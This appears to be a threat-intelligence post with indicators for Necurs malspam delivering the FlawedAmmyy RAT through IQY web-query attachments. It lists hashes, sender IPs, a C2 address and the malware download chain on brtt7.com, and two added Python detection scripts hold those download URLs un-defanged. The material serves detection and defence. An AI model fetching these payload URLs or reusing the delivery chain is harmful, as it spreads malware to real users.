Necurs Botnet Delivering FlawedAmmyy RAT - 2018-06-13


#1

The Necurs botnet is sending out malspam that carries an IQY (Excel Web Query) file attachment; the final payload appears to be the FlawedAmmyy RAT.

The From and To addresses share a domain: the From address is set to the domain of the To recipient, so the message looks as if it came from inside the recipient's own organization.

Date/time:
2018-06-13T12:39:29

Sender IP:
95.76.19.110
217.64.107.131

Last hop:
95.76.18.236
217.64.107.196

Shodan.io / Censys.io for lasthop(s):
https://www.shodan.io/95.76.18.236
https://www.censys.io/ipv4/95.76.18.236
https://www.shodan.io/217.64.107.196
https://www.censys.io/ipv4/217.64.107.196

Headers received:
from [95[.]76[.]19[.]110] (unknown [95[.]76[.]18[.]236]) by Wed, 13 Jun 2018 12:39:29 +0000 (UTC)
from [217[.]64[.]107[.]131] (unknown [217[.]64[.]107[.]196]) by; Wed, 13 Jun 2018 12:39:42 +0000 (UTC)

Helo:
95[.]76[.]19[.]110
217[.]64[.]107[.]131

Headers x-mailer:
none

Subject line(s):
CPY0000258060
CPY00000754299
CP000089568
CPY0000484
COPY00009894
CPY00000926002
CPY00009601701
CP0000352
CPY00006684
SCAN_3193699_13062018
CPY0000274960
EPSON002_130618_00001

Message Body:
“Sent from my Samsung device”

Attachments:
Name: CPY0000258060.iqy
MD5: 9e54a976d2ab609d9462c71a813a1f81
SHA1: 880a494938f5aeb59455c4d32d544892395f46b5
SHA256: 47bdb8e1975c5162d35d6b42a395e7a61211364c55824525ea41c27c671d68fd
SHA512: 223836c1b5e63ba0f3225f62a2df629770e5fc0313d544e55527bd8aa5e294c439f22972a055b651d7c4c1e0c299321e6daeda09e19b3190c2e027c2a5d7f95b
File type: ASCII text, with CRLF line terminators
File size: 36 bytes

https://www.virustotal.com/#/file/47bdb8e1975c5162d35d6b42a395e7a61211364c55824525ea41c27c671d68fd/detection
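The two message traits noted above (a From address at the recipient's own domain and a bare-IP HELO in the earliest Received hop) and the .iqy attachment can be checked together in one triage script. The following is an added example, not code from the original post: the message it parses is constructed to match the shape described here (example.invalid and the 192.0.2.x addresses are placeholders, as is the mx host), and only the download URL comes from this page's IOCs. The IQY layout it parses (a `WEB` line, a version line, then the query URL) is the standard Excel Web Query format.

```python
"""Triage a malspam message for the traits described on this page:
From at the recipient's own domain, a bare-IP HELO in the earliest
Received hop, and an .iqy attachment whose web-query URL is extracted
and compared against the download IOCs listed here.
Added example; the message below is constructed, not a real capture."""
import email
import email.utils
import re
from email import policy

# Constructed sample in the shape this page describes. example.invalid and
# the 192.0.2.x addresses are placeholders; only the URL is a page IOC.
SAMPLE_EML = (
    "Received: from [192.0.2.10] (unknown [192.0.2.11]) by mx.example.invalid;"
    " Wed, 13 Jun 2018 12:39:29 +0000 (UTC)\r\n"
    "From: accounts@example.invalid\r\n"
    "To: finance@example.invalid\r\n"
    "Subject: CPY0000258060\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-Type: multipart/mixed; boundary="b1"\r\n'
    "\r\n"
    "--b1\r\n"
    "Content-Type: text/plain\r\n"
    "\r\n"
    "Sent from my Samsung device\r\n"
    "--b1\r\n"
    'Content-Type: application/octet-stream; name="CPY0000258060.iqy"\r\n'
    'Content-Disposition: attachment; filename="CPY0000258060.iqy"\r\n'
    "\r\n"
    "WEB\r\n"
    "1\r\n"
    "http://brtt7.com/preload.gif\r\n"
    "--b1--\r\n"
)

# Download URLs listed on this page, with the hxxp defanging undone.
IOC_URLS = {
    "http://brtt7.com/preload.gif",
    "http://brtt7.com/load.gif",
    "http://brtt7.com/target.gif",
}

# HELO given as a bare IPv4 literal, e.g. "from [95.76.19.110] (unknown ...)".
IP_LITERAL_HELO = re.compile(r"^from \[\d{1,3}(?:\.\d{1,3}){3}\]")
URL_LINE = re.compile(r"^(?:https?|file)://", re.IGNORECASE)


def addr_domain(header_value):
    """Lower-cased domain of the first address in a From/To header."""
    _, addr = email.utils.parseaddr(str(header_value or ""))
    return addr.rpartition("@")[2].lower()


def earliest_hop_helo_is_ip(msg):
    """Received headers are prepended per hop, so the last one is the
    submitting client's hop; flag it when the HELO is an IP literal."""
    received = msg.get_all("Received") or []
    return bool(received) and bool(IP_LITERAL_HELO.match(str(received[-1]).strip()))


def iqy_urls(data):
    """URLs from an Excel Web Query file: a 'WEB' line, a version line
    (usually '1'), then the query URL, optionally followed by parameters.
    utf-8-sig tolerates a leading BOM such as the one on load.gif above."""
    lines = [l.strip() for l in data.decode("utf-8-sig", "replace").splitlines()]
    lines = [l for l in lines if l]
    if not lines or lines[0].upper() != "WEB":
        return []
    return [l for l in lines[1:] if URL_LINE.match(l)]


def triage(raw_eml):
    """Return the findings an analyst would want from one message."""
    msg = email.message_from_string(raw_eml, policy=policy.default)
    from_dom, to_dom = addr_domain(msg["From"]), addr_domain(msg["To"])
    urls = []
    for part in msg.iter_attachments():
        if (part.get_filename() or "").lower().endswith(".iqy"):
            urls.extend(iqy_urls(part.get_payload(decode=True)))
    return {
        "from_matches_to_domain": bool(from_dom) and from_dom == to_dom,
        "bare_ip_helo": earliest_hop_helo_is_ip(msg),
        "iqy_urls": urls,
        "known_ioc": [u for u in urls if u.lower() in IOC_URLS],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_EML).items():
        print(f"{key}: {value}")
```

Run on a real .eml the same way (`triage(open(path).read())`); a hit on all three findings plus a URL in IOC_URLS is a strong match for this campaign, while a lone `from_matches_to_domain` is common in legitimate internal mail and should not alert by itself.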

Downloads:
hxxp://brtt7.com/preload.gif

Name: preload.gif
MD5: 7ce908bcef0bd51e5a091c2386f85327
SHA1: d174b07c843ea3a287d603e3bbadf63b9e9da51a
SHA256: 903ef3ab2201ebd83a7506597409527b88def373eaec0942582dc144c446069a
File type: ASCII text, with CRLF line terminators
File size: 16600 bytes

hxxp://brtt7.com/target.gif

Name: target.gif
MD5: dc7c5c557de7eb6878294e313e23083a
SHA1: 5ccb4b7da6275f488c7316ce8d10d92dd2371877
SHA256: 963f1735e9ee06c66fdf3a831d7c262bc8bce0d7155e37f9a5aa2677e0a6090c
File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
File size: 215000 bytes

hxxp://brtt7.com/load.gif

Name: load.gif
MD5: 055fbddcc6acac5a5c80f9fd0be7b76d
SHA1: b7d2f84badc52c83ef4575669d8838a44c1f75ce
SHA256: e9c2cc6933f369990e7a96a4dbc8aa7c5cacb102590564e9376cfefc28972754
File type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
File size: 30400 bytes
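The chain above serves three stages under .gif names, yet by the file types listed none of them is a GIF (ASCII text, UTF-8 text with a BOM, and a PE32 executable). A proxy or sandbox can catch that mismatch by sniffing leading bytes instead of trusting the extension. The following is an added example, not code from the original post; the sample bytes in SAMPLES are constructed stand-ins with the same file types the page lists, not the real payloads.

```python
"""Extension-versus-content check for the download chain above.
Added example; SAMPLES holds constructed stand-ins with the same file
types the page lists, not the real payloads."""
UTF8_BOM = b"\xef\xbb\xbf"

# Leading bytes an image of that extension must start with.
IMAGE_MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}


def sniff(data):
    """Coarse type from leading bytes, the way `file` reports it."""
    if not data:
        return "empty"
    for magics in IMAGE_MAGIC.values():
        if data.startswith(magics):
            return "image"
    if data.startswith(b"MZ"):
        return "pe"  # MS-DOS stub that every PE32 file begins with
    if data.startswith(UTF8_BOM):
        return "utf8-bom-text"
    if all(b in b"\t\r\n" or 32 <= b < 127 for b in data[:512]):
        return "ascii-text"
    return "data"


def extension(name):
    """Lower-cased final extension including the dot, or '' if none."""
    return "." + name.rsplit(".", 1)[1].lower() if "." in name else ""


def mismatched_downloads(files):
    """files maps a download name to its bytes. Return {name: sniffed type}
    for every file whose extension claims an image the bytes do not match."""
    out = {}
    for name, data in files.items():
        magics = IMAGE_MAGIC.get(extension(name))
        if magics and not data.startswith(magics):
            out[name] = sniff(data)
    return out


# Constructed stand-ins matching the types listed for each stage above.
SAMPLES = {
    "preload.gif": b"' constructed ASCII text stand-in\r\n",
    "load.gif": UTF8_BOM + b"# constructed UTF-8 text stand-in\r\n",
    "target.gif": b"MZ\x90\x00" + b"\x00" * 58 + b"\x40\x00\x00\x00",
    "logo.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00",  # a genuine GIF header
}

if __name__ == "__main__":
    for name, kind in mismatched_downloads(SAMPLES).items():
        print(f"{name}: named like an image, content is {kind}")
```

The same check applies to the HTTP Content-Type a server returns: a response claiming image/gif whose body starts with `MZ` is worth blocking at the proxy regardless of reputation.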

Callouts:
185.176.221.29
169.239.129.125

https://community.riskiq.com/search/169.239.129.125
https://community.riskiq.com/search/certificate/serialNumber/57397899145990363081023081275480378375
https://community.riskiq.com/search/185.176.221.29

hxxp://185.176.221.29/ban3.dat

Name: ban3.dat
MD5: 0d7d4bb7ab1b92a1bf832a808d032194
SHA1: ff2bb5948e4a5c84110b84948ce43cccc4bc65da
SHA256: b1f096e1aee803a3db286924bee4ddd0d97f1856b21c2603ef561c142186d98a
File type: data
File size: 648000 bytes

Find more recent and related IOCs in Necurs Botnet Delivering FlawedAmmyy RAT - 2018-06-07 and Necurs Botnet Delivering FlawedAmmyy RAT - 2018-05-25.

More info:

#Necurs sending out new IQY web query files. Subject: CPxxxxxxx, downloads hxxp://brtt7.com/preload.gif -> hxxp://brtt7.com/load.gif -> hxxp://brtt7.com/target.gif -> target.gif (binary) @dvk01uk @JAMESWT_MHT @malwrhunterteam @GossiTheDog @jonathanscrowe pic.twitter.com/u1E7MWPLb2

— Magni R. Sigurdsson (@Magnirs) June 13, 2018

This is more #flawedammyy pic.twitter.com/4nAcnxKNm9

— James (@James_inthe_box) June 13, 2018